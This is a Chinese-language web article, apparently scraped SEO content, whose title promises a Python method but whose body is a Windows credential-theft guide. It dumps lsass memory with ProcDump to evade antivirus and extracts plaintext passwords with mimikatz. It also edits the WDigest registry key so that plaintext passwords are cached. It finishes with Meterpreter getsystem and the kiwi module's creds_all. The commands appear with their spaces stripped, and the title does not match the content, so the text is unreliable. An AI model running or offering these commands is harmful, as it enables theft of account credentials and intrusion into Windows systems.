python如何直接获取windows明文密码(python,windows,开发技术)

时间:2024-04-30 09:11:29 作者 : 石家庄SEO 分类 : 开发技术
  • TAG :

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取Windows明文密码。

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密码

在目标机器上生成存储文件:

procdump64.exe-accepteula-malsass.exelsass.dmp

python如何直接获取windows明文密码

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonpasswords""exit">pssword.txt

如图:成功从内存中提取明文密码。

python如何直接获取windows明文密码

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表

regaddHKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest/vUseLogonCredential/tREG_DWORD/d1/f

(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe"privilege::debug""sekurlsa::logonpasswords">pssword.txt

python如何直接获取windows明文密码

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter>getuidServerusername:BYPASS-E97BA3FC\Administratormeterpreter>getsystem...gotsystemviatechnique1(NamedPipeImpersonation(InMemory/Admin)).meterpreter>getuidServerusername:NTAUTHORITY\SYSTEM

加载kiwi模块:

loadkiwi

列举系统中的明文密码:

creds_all

python如何直接获取windows明文密码

 </div> <div class="zixun-tj-product adv-bottom"></div> </div> </div> <div class="prve-next-news">
本文:python如何直接获取windows明文密码的详细内容,希望对您有所帮助,信息来源于网络。
上一篇:DIV+CSS清除浮动常用的方法有哪些下一篇:

4 人围观 / 0 条评论 ↓快速评论↓

(必须)

(必须,保密)

阿狸1 阿狸2 阿狸3 阿狸4 阿狸5 阿狸6 阿狸7 阿狸8 阿狸9 阿狸10 阿狸11 阿狸12 阿狸13 阿狸14 阿狸15 阿狸16 阿狸17 阿狸18